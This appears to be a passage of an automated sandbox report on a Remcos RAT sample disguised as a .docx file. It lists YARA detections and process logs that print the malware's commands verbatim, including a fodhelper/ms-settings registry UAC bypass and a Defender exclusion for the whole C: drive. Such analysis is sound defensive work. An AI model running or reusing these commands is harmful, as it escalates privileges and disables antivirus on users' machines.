Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A04318 | 24_2_00007FF7E0A04318 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A05128 | 24_2_00007FF7E0A05128 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A09890 | 24_2_00007FF7E0A09890 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A07C7C | 24_2_00007FF7E0A07C7C |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A09C74 | 24_2_00007FF7E0A09C74 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A07670 | 24_2_00007FF7E0A07670 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A02D70 | 24_2_00007FF7E0A02D70 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B74E6 | 31_2_045B74E6 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045BE558 | 31_2_045BE558 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B8770 | 31_2_045B8770 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045BE0CC | 31_2_045BE0CC |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459F0FA | 31_2_0459F0FA |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045D4159 | 31_2_045D4159 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B8168 | 31_2_045B8168 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045C61F0 | 31_2_045C61F0 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045BE2FB | 31_2_045BE2FB |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045D332B | 31_2_045D332B |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045A739D | 31_2_045A739D |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B7D33 | 31_2_045B7D33 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B5E5E | 31_2_045B5E5E |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045A6E0E | 31_2_045A6E0E |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045BDE9D | 31_2_045BDE9D |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04593FCA | 31_2_04593FCA |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B6FEA | 31_2_045B6FEA |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B78FE | 31_2_045B78FE |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045B3946 | 31_2_045B3946 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045CD9C9 | 31_2_045CD9C9 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045A7A46 | 31_2_045A7A46 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459DB62 | 31_2_0459DB62 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045A7BAF | 31_2_045A7BAF |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06421082 | 31_2_06421082 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0646E678 | 31_2_0646E678 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_064486F5 | 31_2_064486F5 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0645941F | 31_2_0645941F |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_064545F5 | 31_2_064545F5 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_064585AD | 31_2_064585AD |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0645F207 | 31_2_0645F207 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0644804C | 31_2_0644804C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06458195 | 31_2_06458195 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06474E08 | 31_2_06474E08 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06458E17 | 31_2_06458E17 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06466E9F | 31_2_06466E9F |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06473FDA | 31_2_06473FDA |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0645EFAA | 31_2_0645EFAA |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06434C79 | 31_2_06434C79 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06457C99 | 31_2_06457C99 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0645ED7B | 31_2_0645ED7B |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0643FDA9 | 31_2_0643FDA9 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06447ABD | 31_2_06447ABD |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0645EB4C | 31_2_0645EB4C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_06456B0D | 31_2_06456B0D |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0644885E | 31_2_0644885E |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0643E811 | 31_2_0643E811 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_064589E2 | 31_2_064589E2 |
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: unknown | Process created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe" | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif | |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " | |
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe | |
Source: unknown | Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe | Jump to behavior |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" | |
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe | |
Source: C:\Users\Public\alpha.exe | Process created: unknown unknown | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: aclui.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ntdsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: xmllite.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: url.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ieframe.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: iertutil.dll | Jump to behavior |
